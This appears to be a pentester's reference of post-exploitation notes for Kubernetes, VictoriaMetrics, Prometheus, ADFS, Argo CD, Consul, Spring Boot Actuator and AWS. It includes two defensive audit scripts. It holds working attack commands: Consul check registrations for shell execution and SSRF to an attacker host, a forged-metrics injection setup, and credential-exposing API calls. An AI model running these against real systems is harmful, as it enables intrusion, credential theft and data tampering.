Node Post-Exploitation
After escaping to the worker node, you will have access to all containers located on it.
The script can-they.sh will automatically get the tokens of other pods and check if they have the permission you are looking for (instead of you checking them one by one):
./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"
GitHub
badPods/scripts/can-they.sh at main · BishopFox/badPods
A collection of manifests that will create pods with elevated privileges. - BishopFox/badPods
VictoriaMetrics
If you come across a VictoriaMetrics cluster whose components are not protected by vmauth (the service that handles auth and proxying to the other components, per the wiki), you can not only read all collected metrics but also forge them by pushing your own.
1) Bring up your own Prometheus with a configuration specifying:
global:
  scrape_interval: 10s
scrape_configs:
  - job_name: 'redteam'
    metrics_path: /metrics
    static_configs:
      - targets: ['redteam.ru:9100'] # the target we want to spoof
remote_write:
  - url: "http://host:8429/api/v1/write" # the service accepting metrics, e.g. vmagent
In the Prometheus container, add an /etc/hosts entry for redteam.ru pointing at our web server with the metrics.
2) Bring up a web server that will serve the fake metrics:
import http.server
import socketserver

PORT = 9100

# Fake metrics in the Prometheus text exposition format
METRICS = """
# HELP cpu_usage Test metric
# TYPE cpu_usage gauge
cpu_usage{job="redteam"} 0.64
""".encode('utf-8')

class MetricsHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Serve the metrics only on the path Prometheus scrapes
        if self.path == '/metrics':
            self.send_response(200)
            self.send_header("Content-type", "text/plain; version=0.0.4; charset=utf-8")
            self.end_headers()
            self.wfile.write(METRICS)
        else:
            self.send_response(404)
            self.end_headers()

with socketserver.TCPServer(("", PORT), MetricsHandler) as httpd:
    print("serving metrics at port", PORT)
    httpd.serve_forever()
3) Every 10 seconds Prometheus will fetch the metrics and push them to the path specified in remote_write. This way you can specify both an already existing job_name and an existing target for it, and inject into the data that Grafana shows for a particular instance.
collection of curated tools, guides, and best practices for securing decentralized systems and smart contracts in the blockchain space
* Roadmaps & Learning Paths
* Smart Contract Programming Best Practices
* Audit Reports
* Security Checklists
* CTFs & Challenges
* Exploit Repositories
etc...
GitHub
GitHub - Raiders0786/web3-security-resources: The Web3 Security Resources Hub is a comprehensive collection of curated tools, guides…
The Web3 Security Resources Hub is a comprehensive collection of curated tools, guides, and best practices for securing decentralized systems and smart contracts in the blockchain space. - Raiders0...
ADFS Post-Exploitation
How to access cloud systems outside domain - Introduction to the SAML attack against ADFS
Tools
* ADFSDump - Dump decryption private keys and other sorts of goodies from AD FS
* ADFSpoof - A python tool to forge AD FS security tokens
Orangecyberdefense
The Golden SAML Attack Against ADFS.
Attackers can determine if there are any ADFS installations and proceed to access these with the intent to extract sensitive information from those hosts.
Prometheus pentest
Exposed administration interfaces
Prometheus provides an optional management API which can be enabled via the command line flags web.enable-admin-api and web.enable-lifecycle. These endpoints allow deletion of all saved metrics and shutting down of the monitoring server, respectively. The endpoints are disabled by default, but in a non-secure deployment, an attacker can query the status of these settings from the API endpoint /api/v1/status/flags to check if they have been manually enabled:
{
  "status": "success",
  "data": {
    "web.enable-admin-api": "true",
    "web.enable-lifecycle": "false"
  }
}
Targets disclosure
API endpoint /api/v1/targets exposes services belonging to the infrastructure, including their roles and labels. The endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, e.g. dangerous labels with possible sensitive information disclosure:
__meta_gce_metadata_ssh_keys
__meta_gce_metadata_startup_script
__meta_gce_metadata_kube_env
__meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration
Articles:
* Don’t let Prometheus Steal your Fire
* How attackers use exposed Prometheus server to exploit Kubernetes clusters
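An added audit example (not from the articles above): it parses constructed copies of the two API responses described here and reports enabled admin/lifecycle flags and the sensitive discovered labels listed above, so a defender can run the same check against their own Prometheus output. The JSON samples are made up for this example.

```python
import json
import re

# Constructed sample of GET /api/v1/status/flags (values made up for this example)
FLAGS_RESPONSE = json.dumps({"status": "success", "data": {
    "web.enable-admin-api": "true", "web.enable-lifecycle": "false"}})

# Constructed sample of GET /api/v1/targets; discoveredLabels hold the pre-relabeling
# __meta_* labels from service discovery, which is where provider metadata leaks.
TARGETS_RESPONSE = json.dumps({"status": "success", "data": {"activeTargets": [
    {
        "discoveredLabels": {
            "__address__": "10.0.0.5:9100",
            "__meta_gce_instance_name": "web-1",
            "__meta_gce_metadata_ssh_keys": "ops:ssh-ed25519 AAAA... (made up)",
            "__meta_gce_metadata_startup_script": "#!/bin/sh (made up)",
        },
        "labels": {"job": "node", "instance": "10.0.0.5:9100"},
    },
    {
        "discoveredLabels": {
            "__address__": "10.1.2.3:8080",
            "__meta_kubernetes_pod_name": "api-0",
            "__meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration": "{}",
        },
        "labels": {"job": "k8s-pods", "instance": "10.1.2.3:8080"},
    },
]}})

# Flags whose value "true" means the admin/lifecycle endpoints are live.
RISKY_FLAGS = ("web.enable-admin-api", "web.enable-lifecycle")
# Label-name fragments that, per the article, commonly carry secrets or config.
SENSITIVE_LABEL_RE = re.compile(
    r"^__meta_.*(ssh_keys|startup_script|kube_env|last_applied_configuration)")

def risky_flags(flags_json):
    """Return the risky flags that /api/v1/status/flags reports as enabled."""
    data = json.loads(flags_json)["data"]
    return [flag for flag in RISKY_FLAGS if data.get(flag) == "true"]

def sensitive_labels(targets_json):
    """Return (instance, label) for each discovered label matching a sensitive pattern."""
    hits = []
    for target in json.loads(targets_json)["data"]["activeTargets"]:
        instance = target.get("labels", {}).get("instance", "?")
        for name in target.get("discoveredLabels", {}):
            if SENSITIVE_LABEL_RE.match(name):
                hits.append((instance, name))
    return hits
```

Any hit from sensitive_labels is a label to drop with a relabel_config (or to keep off the target provider), and any hit from risky_flags means the server must sit behind authentication.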
JFrog
Don’t let Prometheus Steal your Fire
How to deploy & configure Prometheus securely, including authentication and encryption capabilities. Real-world exposures discovered by the JFrog Security Research team
Openstack pentest
Articles
OpenStack from a penetration tester perspective
Part 1
Part 2
Part 3
Tool
openstack-security-tool
Medium
OpenStack from a penetration tester perspective: Part 1
ArgoCD - Declarative, GitOps tool for continuous delivery on Kubernetes
Template for deploying pod and code execution within a cluster - Link
CVE-2024-31989
* Use of Risky or Missing Cryptographic Algorithms in Redis Cache (Summary & PoC)
* Redis or Not – Revealing a Critical Vulnerability in Argo CD Kubernetes Controller
CVE-2025-55190
Argo CD's Project API Token Exposes Repository Credentials
curl -sH "Authorization: Bearer $ARGOCD_API_TOKEN" \
"https://argocd.example.com/api/v1/projects/myProject/detailed"
Hardening
* Six Critical Blindspots While Securing Argo CD
* Securing Multi-Cluster ArgoCD
* Securing Continuous Delivery: Argo CD Threat Detection
GitHub
GitHub - cotsom/argocd-helloapp
Contribute to cotsom/argocd-helloapp development by creating an account on GitHub.
Consul
SSRF
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
  "ID": "testservice",
  "Name": "testservice",
  "Address": "127.0.0.1",
  "Port": 80,
  "check": {
    "HTTP": "http://attackerIp:attackerPort",
    "interval": "10s"
  }
}' http://consul-host:8500/v1/agent/service/register
RCE
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
  "ID": "testservice",
  "Name": "testservice",
  "Address": "127.0.0.1",
  "Port": 80,
  "check": {
    "Args": ["/bin/sh", "-c", "id"],
    "interval": "10s"
  }
}' http://consul-host:8500/v1/agent/service/register
Agents
Get check output
curl http://consul-host:8500/v1/agent/checks | jq
Unregister agent
curl http://consul-host:8500/v1/agent/service/deregister/testservice -X PUT
Article - Consul by HashiCorp: from Infoleak to RCE
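An added example for the defending side (not from the Wallarm article or Consul itself): it parses a constructed copy of the /v1/agent/checks output shown above and lists every check that makes the agent execute a command, together with the first line of its output, and checks whether an agent config would accept such checks over the HTTP API at all (the enable_script_checks setting; enable_local_script_checks only permits checks from local config files). Field names follow Consul's HealthCheck object; the values are made up.

```python
import json

# Constructed sample of GET /v1/agent/checks; field names follow Consul's HealthCheck
# object (CheckID, ServiceID, Type, Output), all values are made up for this example.
CHECKS_RESPONSE = json.dumps({
    "service:testservice": {
        "CheckID": "service:testservice", "Name": "Service 'testservice' check",
        "Status": "passing", "ServiceID": "testservice", "Type": "script",
        "Output": "uid=100(consul) gid=1000(consul) groups=1000(consul)\n",
    },
    "service:web": {
        "CheckID": "service:web", "Name": "Service 'web' check",
        "Status": "passing", "ServiceID": "web", "Type": "http",
        "Output": "HTTP GET http://127.0.0.1:8080/health: 200 OK",
    },
    "serfHealth": {
        "CheckID": "serfHealth", "Name": "Serf Health Status",
        "Status": "passing", "ServiceID": "", "Type": "",
        "Output": "Agent alive and reachable",
    },
})

# Check types that make the agent run a command on its host.
EXEC_CHECK_TYPES = {"script", "docker"}

def exec_checks(checks_json):
    """Return (CheckID, ServiceID, first output line) for each command-executing check."""
    found = []
    for check_id, check in json.loads(checks_json).items():
        if check.get("Type") in EXEC_CHECK_TYPES:
            output = check.get("Output", "")
            first_line = output.splitlines()[0] if output else ""
            found.append((check_id, check.get("ServiceID", ""), first_line))
    return found

def api_script_checks_allowed(agent_config):
    """True if the agent config (as a dict) lets script checks be registered over the
    HTTP API, i.e. enable_script_checks is set; enable_local_script_checks does not."""
    return bool(agent_config.get("enable_script_checks", False))
```

Running exec_checks on a real agent's output is a quick way to spot a check like the one registered above, and the fix is to leave enable_script_checks off and put ACLs in front of the agent API.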
Wallarm
Consul by HashiCorp: from Infoleak to RCE
Basically, Consul ensures the coherence of system components and the trust between them. Consul is at the core of your system.
Spring Boot Actuator
Article
Under the Radar: Exploring Spring Boot Actuator Misconfigurations
* What makes Spring Boot Actuator a treasure trove for attackers?
* Common Misconfigurations in Spring Boot Actuator
#1 Exposed HeapDump file
#2 Exposed Actuator Gateway Endpoint leading to RCE
#3 Exposed env endpoint
* How Can Organizations Defend Themselves?
Recon
* /actuator - List of all available actuator endpoints
* /actuator/mappings - All URL mappings (controllers and handlers), request → method mappings
* /actuator/beans - Shows registered Spring beans
* /actuator/configprops - Values and sources ConfigurationProperties
Exploitation
* /actuator/heapdump - Exposed HeapDump file
* /actuator/env - Expose details about the runtime environment
* /actuator/httptrace - Leakage of payload structures, internal URLs, possible query data
* /actuator/loggers - Shows current logging levels and (if enabled) allows you to change logger levels at runtime
* /actuator/gateway/routes - SSRF, can lead to RCE (CVE-2022-22947)
wiz.io
Exploring Spring Boot Actuator Misconfigurations | Wiz Blog
Misconfigurations in Spring Boot Actuator’s endpoints can leak environment variables, passwords, and API keys, and even lead to remote code execution.
AWS pwn
A collection of scripts for AWS penetration testing. Contains sets of scripts for
* Reconnaissance - Things to do with pre-compromise information gathering.
* Exploitation - Things that will help you gain a foothold in an account.
* Stealth - Things that might help you stay hidden after compromising an account.
* Exploration - Things to help you understand what you've pwned.
* Elevation - Things to help you move around an account and gather different levels of access.
* Persistence - Things to help maintain your access to an account.
* Exfiltration - Things to help you extract and move data around in AWSy ways.
GitHub
GitHub - dagrz/aws_pwn: A collection of AWS penetration testing junk
A collection of AWS penetration testing junk. Contribute to dagrz/aws_pwn development by creating an account on GitHub.